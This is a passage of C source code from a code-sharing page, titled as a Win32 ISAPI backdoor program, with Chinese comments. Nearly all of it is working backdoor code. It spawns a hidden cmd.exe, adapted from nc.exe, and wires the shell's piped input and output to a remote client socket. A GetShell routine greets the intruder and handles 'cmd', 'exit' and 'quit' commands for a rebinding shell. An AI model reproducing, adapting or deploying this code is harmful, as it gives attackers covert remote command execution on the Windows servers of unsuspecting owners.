📄 win32 isapi后门程序.txt
字号:
num = recv(sc,buf,1024,0);
if(num>0)
send(ss,buf,num,0);
else if(num==0) break;
}
closesocket(ss);
closesocket(sc);
return 0 ;
}
DWORD WINAPI LogToFile(char *buf)
{
if(bLog)
{
FILE *log;
if( (log=fopen(LOGFILE,"a+"))!=NULL )
{
fputs(buf, log);
fclose(log);
return 0;
}
}
return 1;
}
//********************************************************************************
// //
// 创建会话 (From nc.exe) //
// //
// 创建一个新的会话, 包括创建一个cmd shell和两个读写管道进行相互通讯 //
// 成功执行则返回会话句柄,失败则返回NULL. //
//********************************************************************************
PSESSION_DATA CreateSession(char *prog)
{
PSESSION_DATA Session = NULL;
SECURITY_ATTRIBUTES SecurityAttributes; // 创建管道所用
BOOL Result;
HANDLE ShellStdinPipe = NULL;
HANDLE ShellStdoutPipe = NULL;
PROCESS_INFORMATION ProcessInformation; // 创建进程序所用
STARTUPINFO si;
// 为会话类型数据分配内存空间
Session = (PSESSION_DATA) malloc(sizeof(SESSION_DATA));
if(Session == NULL) return(NULL);
// 初始化会话读写管道句柄
Session->ReadPipeHandle = NULL;
Session->WritePipeHandle = NULL;
// 为Shell创建读写管道
SecurityAttributes.nLength = sizeof(SecurityAttributes);
SecurityAttributes.lpSecurityDescriptor = NULL; // 使用默认ACL
SecurityAttributes.bInheritHandle = TRUE; // 设置继承句柄
// 创建读取管道
Result = CreatePipe(&Session->ReadPipeHandle, &ShellStdoutPipe, &SecurityAttributes, 0);
if(!Result) goto Failure;
// 创建写入管道
Result = CreatePipe(&ShellStdinPipe, &Session->WritePipeHandle, &SecurityAttributes, 0);
if(!Result) goto Failure;
// 创建Shell进程
// 初始化进程启动信息
si.cb = sizeof(STARTUPINFO);
si.lpReserved = NULL;
si.lpTitle = NULL;
si.lpDesktop = NULL;
si.dwX = si.dwY = si.dwXSize = si.dwYSize = 0L;
si.wShowWindow = SW_HIDE;
si.lpReserved2 = NULL;
si.cbReserved2 = 0;
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.hStdInput = ShellStdinPipe;
si.hStdOutput = ShellStdoutPipe;
DuplicateHandle(GetCurrentProcess(), ShellStdoutPipe,
GetCurrentProcess(), &si.hStdError,
DUPLICATE_SAME_ACCESS, TRUE, 0);
if(CreateProcess(NULL, prog, NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation))
{
Session->ProcessHandle = ProcessInformation.hProcess;
CloseHandle(ProcessInformation.hThread);
}
// 成功创建则关闭句柄
CloseHandle(ShellStdinPipe);
CloseHandle(ShellStdoutPipe);
// 检测Shell进程序是否成功创建
if(Session->ProcessHandle == NULL) goto Failure;
// 把客户端连接socket句柄传递给会话数据
Session->ClientSocket = NULL;
// 成功运行,返回会话数据句柄
return(Session);
Failure:
// 如果创建会话数据失败,则关闭已经创建的句柄,并释放内存
if(ShellStdinPipe != NULL) CloseHandle(ShellStdinPipe);
if(ShellStdoutPipe != NULL) CloseHandle(ShellStdoutPipe);
if(Session->ReadPipeHandle != NULL) CloseHandle(Session->ReadPipeHandle);
if(Session->WritePipeHandle != NULL) CloseHandle(Session->WritePipeHandle);
free(Session);
return(NULL);
}
//********************************************************************************
// //
// 读取会话线程 //
// //
// 从Shell进程里读取数据,并把结果把写回连接的socket //
//********************************************************************************
VOID SessionReadShell(LPVOID Parameter)
{
PSESSION_DATA Session = (PSESSION_DATA)Parameter;
BYTE Buffer[BUFFER_SIZE];
BYTE Buffer2[BUFFER_SIZE+30];
DWORD BytesRead;
// 检测Shell进程的读管道里是否有数据返回
while(PeekNamedPipe(Session->ReadPipeHandle, Buffer, sizeof(Buffer), &BytesRead, NULL, NULL))
{
DWORD BufferCnt, BytesToWrite;
BYTE PrevChar = 0;
// 如果有数据则读取,无则返回
if(BytesRead > 0)
{
ReadFile(Session->ReadPipeHandle, Buffer, sizeof(Buffer), &BytesRead, NULL);
}
else
{
Sleep(10);
continue;
}
// 替换CR-LF为LF.
for(BufferCnt = 0, BytesToWrite = 0; BufferCnt < BytesRead; BufferCnt++)
{
if(Buffer[BufferCnt] == '\n' && PrevChar != '\r')
Buffer2[BytesToWrite++] = '\r';
PrevChar = Buffer2[BytesToWrite++] = Buffer[BufferCnt];
}
// 把读取的数据写入客户端连接Socket.
if(send(Session->ClientSocket, (const char*)Buffer2, BytesToWrite, 0) <= 0) break;
}
// if (GetLastError() != ERROR_BROKEN_PIPE)
// printf("SessionReadShellThreadFn exitted, error = %d\r\n", GetLastError());
ExitThread(0);
}
//********************************************************************************
// //
// 会话写进程 //
// //
// 写进程,从连接Socket读取数据, 把数据写入Shell进程 //
//********************************************************************************
VOID SessionWriteShell(LPVOID Parameter)
{
PSESSION_DATA Session = (PSESSION_DATA)Parameter;
BYTE RecvBuffer[1];
BYTE Buffer[BUFFER_SIZE];
BYTE EchoBuffer[5];
DWORD BytesWritten;
DWORD BufferCnt, EchoCnt;
DWORD TossCnt = 0;
BOOL PrevWasFF = FALSE;
BufferCnt = 0;
// 循环从Socket读取数据
while(recv(Session->ClientSocket, (char *)RecvBuffer, sizeof(RecvBuffer), 0) != 0)
{
EchoCnt = 0;
Buffer[BufferCnt++] = EchoBuffer[EchoCnt++] = RecvBuffer[0];
if (RecvBuffer[0] == '\r') Buffer[BufferCnt++] = EchoBuffer[EchoCnt++] = '\n';
// 如果我们接收到一个回车, 则把缓冲区数据写入到Shell进程管道
if (RecvBuffer[0] == '\n' || RecvBuffer[0] == '\r')
// if (RecvBuffer[0] == '\n')
{
if(!WriteFile(Session->WritePipeHandle, Buffer, BufferCnt, &BytesWritten, NULL)) break;
BufferCnt = 0;
}
}
ExitThread(0);
}
//********************************************************************************
// //
// 为客户端连接执行命令 //
// //
//********************************************************************************
BOOL doexec(char *prog)
{
PSESSION_DATA Session = CreateSession(prog);
SECURITY_ATTRIBUTES SecurityAttributes;
DWORD ThreadId;
HANDLE HandleArray[3];
int i;
SecurityAttributes.nLength = sizeof(SecurityAttributes);
SecurityAttributes.lpSecurityDescriptor = NULL; // 使用默认ACL
SecurityAttributes.bInheritHandle = FALSE; // 设置不继承句柄
// 传递Socket
Session->ClientSocket = ClientSock;
// 创建读写会话线程
Session->ReadShellThreadHandle = CreateThread(&SecurityAttributes, 0,
(LPTHREAD_START_ROUTINE)SessionReadShell,
(LPVOID)Session, 0, &ThreadId);
if(Session->ReadShellThreadHandle == NULL)
{
TerminateThread(Session->ReadShellThreadHandle, 0);
TerminateProcess(Session->ProcessHandle, 0);
return(FALSE);
}
TempExeHandle = Session->WriteShellThreadHandle = CreateThread(&SecurityAttributes, 0,
(LPTHREAD_START_ROUTINE)SessionWriteShell,
(LPVOID)Session, 0, &ThreadId);
if(Session->WriteShellThreadHandle == NULL)
{
TerminateThread(Session->ReadShellThreadHandle, 0);
TerminateThread(Session->WriteShellThreadHandle, 0);
TerminateProcess(Session->ProcessHandle, 0);
return(FALSE);
}
// 等待三个句柄结束
HandleArray[0] = Session->ReadShellThreadHandle;
HandleArray[1] = Session->WriteShellThreadHandle;
HandleArray[2] = Session->ProcessHandle;
i = WaitForMultipleObjects(3, HandleArray, FALSE, 0xffffffff);
switch(i)
{
case WAIT_OBJECT_0 + 0:
TerminateThread(Session->WriteShellThreadHandle, 0);
TerminateProcess(Session->ProcessHandle, 1);
break;
case WAIT_OBJECT_0 + 1:
TerminateThread(Session->ReadShellThreadHandle, 0);
TerminateProcess(Session->ProcessHandle, 1);
break;
case WAIT_OBJECT_0 + 2:
Sleep(100);
TerminateThread(Session->ReadShellThreadHandle, 0);
TerminateThread(Session->WriteShellThreadHandle, 0);
default:
break;
}
// 关闭Socket, 线程句柄, shell进程和shell读写管道,释放内存
DisconnectNamedPipe(Session->ReadPipeHandle);
CloseHandle(Session->ReadPipeHandle);
DisconnectNamedPipe(Session->WritePipeHandle);
CloseHandle(Session->WritePipeHandle);
CloseHandle(Session->ReadShellThreadHandle);
CloseHandle(Session->WriteShellThreadHandle);
CloseHandle(Session->ProcessHandle);
free(Session);
return(TRUE);
}
// Give me the shell
VOID GetShell()
{
char Buff[4096], Get[10240], sendbuf[1024];
// 写欢迎信息
strcpy(sendbuf,"Welcome and have a good luck! :)\r\n");
SlowSend(sendbuf, 20);
strcpy(sendbuf,"Use \"cmd\" get cmdshell, use \"exit\" to exit!\r\n");
SlowSend(sendbuf, 10);
Sleep(100);
char szTemp[MAX_PATH],szBuff[MAX_PATH];
GetCurrentDirectory(MAX_PATH, szBuff);
DWORD len=sizeof(szTemp);
GetComputerName(szTemp,&len);
wsprintf(sendbuf, "\r\n%s\n<%s@%s>%s", messages, szBuff, strlwr(szTemp), PROMPT);
send(ClientSock, sendbuf, strlen(sendbuf), 0);
memset(Get, 0,sizeof(Get));
while(1)
{
int nByte = recv(ClientSock, Buff, 1024, 0);
if(nByte <= 0)
break;
else
Buff[nByte] = 0;
strcat(Get, Buff);
if(!strstr(Buff, "\x0a"))
{
memset(Buff, 0, sizeof(Buff));
continue;
}
// 退出Shell
if(strnicmp(Get, "exit", 4) == 0)
{
strcpy(sendbuf, "\r\nClosed! And Good bye!\r\n");
send(ClientSock, sendbuf, strlen(sendbuf), 0);
Sleep(100);
if(ClientSock)
closesocket(ClientSock);
return;
}
// 退出进程
else if(strnicmp(Get, "quit", 4) == 0)
{
strcpy(sendbuf, "\r\nQuit! And End ReBindShell now!\r\n");
send(ClientSock, sendbuf, strlen(sendbuf), 0);
Sleep(100);
if(ClientSock)
closesocket(ClientSock);
if(s)
closesocket(s);
if(hReBind)
TerminateThread(hReBind, 0);
if(hReBind)
CloseHandle(hReBind);
hReBind = NULL;
LogToFile("Closed Re BindShell.\r\n");
}
// 退出进程
else if(strnicmp(Get, "cmd", 3) == 0)
{
doexec("cmd.exe");
}
else if(strlen(Get) >= 2)
{
// docommand(Get);
}
GetCurrentDirectory(MAX_PATH, szBuff);
sprintf(sendbuf, "\r\n<%s@%s>%s", szBuff, strlwr(szTemp), PROMPT);
send(ClientSock, sendbuf, strlen(sendbuf), 0);
memset(Get, 0, sizeof(Get));
memset(Buff, 0, sizeof(Buff));
strcpy(Get, "");
strcpy(Buff, "");
}
if(ClientSock)
closesocket(ClientSock);
return;
}
//********************************************************************************
// //
// 缓慢显示 //
//********************************************************************************
VOID SlowSend(char* sendbuf, int iTime)
{
UINT i;
char test[2];
send(ClientSock, "\r\n", 2, 0);
Sleep(100);
send(ClientSock, "-", 1, 0);
Sleep(100);
send(ClientSock, ">", 1, 0);
Sleep(100);
send(ClientSock, " ", 1, 0);
Sleep(100);
for(i=0; i < strlen(sendbuf); i++)
{
test[0]=sendbuf[i];
test[1]=0;
send(ClientSock, test, strlen(test), 0);
Sleep(iTime);
}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -